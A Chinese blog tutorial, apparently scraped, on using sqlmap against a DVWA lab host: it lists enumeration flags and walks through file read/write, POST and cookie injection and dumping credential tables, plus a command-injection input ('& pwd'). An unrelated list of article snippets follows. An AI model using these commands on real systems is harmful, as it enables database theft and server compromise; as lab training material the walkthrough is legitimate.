SQL注入工具-----sqlmap

article/2025/10/11 5:53:02

sqlmap中的一些常见的命令:

-h,–help 显示基本的帮助信息并退出
-hh 显示高级帮助信息并退出
–version 显示程序版本信息并退出
-u 目标URL
-m 后接一个txt文件,文件中是多个url,sqlmap会自动化的检测其中的所有url
-r 可以将一个post请求方式的数据包(bp抓包)保存在一个txt中,sqlmap会通过post方式检测目标。

枚举:这些选项可以用来列举后端数据库管理系统的信息,表中的结构和数据。

-b, --banner 获取数据库管理系统的标识
–current-user 获取数据库管理系统当前用户
–current-db 获取数据库管理系统当前数据库
–hostname 获取数据库服务器的主机名称
–is-dba 检测DBMS当前用户是否DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–dbs 枚举数据库管理系统数据库
–tables 枚举DBMS数据库中的表
–columns 枚举DBMS数据库表列
-D 要进行枚举的指定数据库名
-T 要进行枚举的指定表名
-C 要进行枚举的指定列名
–dump 转储数据库表项,查询字段值
–search 搜索列(S),表(S)和/或数据库名称(S)
–sql-query=QUERY 要执行的SQL语句
–sql-shell 提示交互式SQL的shell

实例:

利用sqlmap进行文件的读写

简介:sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。
第一步:首先设置好靶机
1.打开http:10.1.1.136,输入用户名:admin 密码:password 登入
在这里插入图片描述

2.找到SQL Injection随意输入一个数,打开burpsuite进行抓包,点击submit,获得cookie.在抓包的时候要注意设置好浏览器的网络设置。

在这里插入图片描述
找到了这个cookie的值。
在这里插入图片描述
在这里插入图片描述
3.在上面找到这个Command Exceution ,并输入:10.1.1.136 & pwd 来获得一个绝对路径。接下来,就是利用这主角sqlmap来进行一下攻击。输入:sqlmap.py -u "sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie="PHPSESSID=“值"security=low” --file-read=/opt/lampp/htdocs/php.ini 下面的成功读取了php.ini文件,并返回路径。
在这里插入图片描述
这时候我们看看,是否成功就打开这个文件是否在这个路劲中。
在这里插入图片描述

对服务端进行写文件

1.输入:sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=“值”; security=low” --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txt
在这里插入图片描述
现在我们就找到了这些东西哦!!!
在这里插入图片描述

利用sqlmap进行POST注入

POST注入形成的原因:POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:
在这里插入图片描述1.打开 http://10.1.1.136,输入用户名:admin 密码: password,登入
在这里插入图片描述2.找到这个brute force这个选项,随意输入你的admin和password,burpsuite抓包。
在这里插入图片描述3.将这些东西抓好包以后,就放在C:/1.txt中的目录中。打开sqlmap列举数据库,输入命令:sqlmap.py -r c:\1.txt -p username --dbs。
在这里插入图片描述4.选择一个数据库,例如找到mysql,输入命令:sqlmap.py -r c:\1.txt -p username -D mysql --tables.
在这里插入图片描述5.找到了列表,在找列,输入命令:sqlmap.py -r c:\1.txt -p username -D mysql -T user --columns.
在这里插入图片描述6.下面是直接挖掘数据,输入命令: sqlmap.py -r c:\1.txt -p username -D mysql - T user -C “User,Password” --dump.
在这里插入图片描述现在数据进行跑之中。
在这里插入图片描述这个过程比较麻烦,所以我在这里要再说一下其实这个东西挺容易的一定要认真的去理解这些东西。
在这里插入图片描述在这里插入图片描述

利用sqlmap进行需要登入的注入

了解cookie:

cookie是由网景公司的前雇员Lou Montulli在1993年3月的发明,由服务器端生成的,发送给User-Agent(一般是浏览器),浏览器会将cookie的值保存到本地一个文本文件中,下次请求同一网站时就发送该cookie给服务器。cookie开发的初衷是为了改善用户体验,提高网络使用速度。

利用sqlmap 进行Cookie注入

1.打开那个dvwa,选择Setup,嗲你就Creat/Reset Database.
在这里插入图片描述2.找到这个SQL Injection ,在进行设置到权限,打开工具==》选项==》高级==》网络==》设置,手动本地127.0.0.1,端口8080.
打开burpsuite进行抓包。找到cookie,并记录下来。再利用sqlmap注入语句,cookie注入命令:sqlmap.py -u 注入点 --cookie=“获取的cookie”
在这里插入图片描述在这里插入图片描述
这是我们找到啦当前的数据库啦!!!
3.下面我们要做的是列出当前的数据库,Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” --current-db
在这里插入图片描述在这里插入图片描述
4.下面是找到了数据库中的表,Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 --tables
在这里插入图片描述
在这里插入图片描述5.接下来是找到用户。Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 -T 表名 --columns。
在这里插入图片描述马上就要看到结果了,查找一下user和password。Cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” -D 数据库 -T 表名 -C 列名 --dump。

利用sqlmap辅助手工注入

1.打开dvwa,找到SQL Injection,随意的提交一个数字,打开burpsuite抓包,来获得cookie.
在这里插入图片描述2.打开sqlmap,输入:sqlmap.py -u “url” --cookie=“ ” --sql-query “select user(),version(),database()”

在这里插入图片描述

3.找到了这个数据库的名字dvwa,下面我们就要找到其中的表名,输入:sqlmap.py -u “url” --cookie=" " --sql-query “(select count(*) from dvwa.users)>0”,返回值是 “1”,说明存在users表。
在这里插入图片描述4.下面开始查找列表。输入:sqlmap.py -u “url” --cookie=" " --sql-query “(select count(username) from dvwa.users) >=0”

在这里插入图片描述没有返回值,现在我们就把username改为user,返回值1.
在这里插入图片描述5.现在我们知道啦列名,开始搞一下内容看看里面都有啥?输入:sqlmap.py -u “url” --cookie=" " --sql-query “select user,password from dvwa.users”.
在这里插入图片描述下面就是借助sqlmap选项–sql-query结合手工注入语句得到了user表中的用户信息。


http://chatgpt.dhexx.cn/article/a44M72S7.shtml

相关文章

SQL注入工具

众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞。 BSQL Hacker 10个SQL注入工具 BSQL Hacker是由Portcullis实验室开发的,BSQL Hacke…

mysql sql注入工具下载_超级SQL注入工具【SSQLInjection】

简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具 (已更新beta15) 超级SQL注入工具(SSQLInjection…

mysql sql注入工具下载_sql注入工具下载|超级SQL注入工具SSQLInjectionv1.0 正式版 附使用说明 - 极光下载站...

超级SQL注入工具正式版下载。超级SQL注入工具虽然有一定的历史了,但是超级SQL注入工具还是一样的强悍!超级SQL注入工具适用于Web渗透的朋友! 超级SQL注入工具简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注…

SQLiDetector:一款功能强大的SQL注入漏洞检测工具

关于SQLiDetector SQLiDetector是一款功能强大的SQL注入漏洞检测工具,该工具支持BurpBouty配置文件,可以帮助广大研究人员通过发送多个请求(包含14种Payload)并检查不同数据库的152个正则表达式模式来检测基于错误的SQL注入漏洞。…

渗透测试 ( 6 ) --- SQL 注入神器 sqlmap

sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:http://…

10个SQL注入工具

众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。 BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入…

Web安全:SQL注入工具

SQL注入工具主要是针对Web服务器后台数据库的注入,其主要目的是获取数据库中的数据。以前常用的SQL注入工具有啊D注入工具及Domain(明小子注入工具),现在常用的SQL注入工具有HackBar、SQLMap 、Pangolin、Havij、Safe3 SQL inject…

面试官:说说设备像素、css像素、设备独立像素、dpr、ppi 之间的区别?

一、背景 在css中我们通常使用px作为单位,在PC浏览器中css的1个像素都是对应着电脑屏幕的1个物理像素 这会造成一种错觉,我们会认为css中的像素就是设备的物理像素 但实际情况却并非如此,css中的像素只是一个抽象的单位,在不同的设…

dpr(设备像素比)与 移动端适配

在上一篇文章中(使用 rem 实现移动端的自适应布局),我们讲到 iphone6s 的屏幕宽度为 375px,我们拿到的视觉稿也是基于iphone6s 设计的,但是设计稿的宽度却是 750px,这是为什么呢? 原因就是 ipho…

新一代Web技术栈的演进:SSR/SSG/ISR/DPR都在做什么?

在开始阅读之前,先解释一下文章里用到的英文缩写: CSR:Client Side Rendering,客户端(通常是浏览器)渲染;SSR:Server Side Rendering,服务端渲染;SSG&#xf…

Dapr

环境: window10 docker desktop dotnet 5.0 一、安装 Dapr CLI 打开 Windows PowerShell 或 cmd ,运行以下命令以安装 Dapr CLI,并添加安装路径到系统环境变量中。 powershell -Command "iwr -useb https://raw.githubusercontent.…

当我们在讨论设备像素比(device pixel ratio,dpr)的时候我们在讨论什么?

目录 0. 为什么要写这篇文章?1. 设备像素比的问题在哪里?1.1. 不同的论述导致不同的理解1.2. 设备独立像素与CSS像素1.3. 小结 2. 设备像素比 设备物理像素/CSS像素,真的正确吗?2.1. PC端验证2.2. 手机端验证2.3. 出了什么问题&a…

动态dp

以前学树型dp留下的题目,没有写,然后过了几个月后又回来写了这道题 战略游戏 这是一道典型的最小点覆盖的模板,蒟蒻采用的是树型dp的做法 设 \(f[i][0/1]\) 在以 \(i\) 为根的子树中,选或不选当前这个点所需要的最少的点 那么转移…

移动端适配dpr

1. 移动端适配的代码(设计稿iPhone6)如下: (function (doc,win) {// seMetaTagScale(doc, win)var fn function () { var deviceWidth doc.documentElement.clientWidth; // css逻辑像素,不是物理像素if (deviceWidth > 82…

移动端布局(一)dp、dip、PPI、dpr、图片模糊

注: 此篇文章引用多篇文章,在文章的结尾处有注明文章的来源 高清屏 即高清屏,把更多的像素压缩至一块屏幕里,从而达到更高分辨率显示的细腻程度,使人眼无法分辨出单个的像素。 物理像素(dp) 物理像素,设备的硬件像素&#xff…

不同设备屏幕尺寸和DPR适配

为什么需要适配 目前市面上设备屏幕属性十分多样化(宽度和DPR并不一致),而作为设计和前端开发,无法为每个尺寸的设备单独设计一套UI并将其转为前端代码,这不现实。所以我们需要一套方案来将一套设计稿完美呈现在不同尺…

DPR-ERR-2109

问题(摘要) [Simplified Chinese] 该技术文档说明了如何解决在安装和配置IBM Rational Common Reporting服务器时可能发生的错误:"DPR-ERR-2109 The dispatcher cannot service the request at this time. The dispatcher is still initializing. …

DPR和REALM论文笔记

DPR(2020 EMNLP) 该论文的模型主要是一个双塔结构如下所示: 整个模型的训练数据D包含m个例子,其中每个例子由一个问题 q i q_i qi​、一个相关段落 p i p_i^ pi​、n个不相关段落 p i , 1 − , ⋯ , p i , n − p_{i,1}^-,\cdots,p_{i,n}^- pi,1−​,⋯…

dpr单位

1px dpr^2 * dp 这个是不是有问题? 结尾的总结: 1px dpr^2 * dp 这个是不是有问题? 以下这个等式不成立吧: 320*568 px 2^2 * 1136*640 1px dpr ^2 * dp 是平面上的像素换算,但实际开发当中使用更多的是长度上的换算&#x…

图文并茂带你弄懂物理分辨率、分辨率、物理像素、逻辑像素、dpr、ppi

目录 物理分辨率和分辨率 什么是物理像素 什么是CSS像素 什么是设备像素比 什么是标清屏和高清屏 缩放 什么是PPI(DPI) 物理分辨率和分辨率 首先得知道物理分辨率和分辨率是2个概念,可别混淆。 物理分辨率(标准分辨率&am…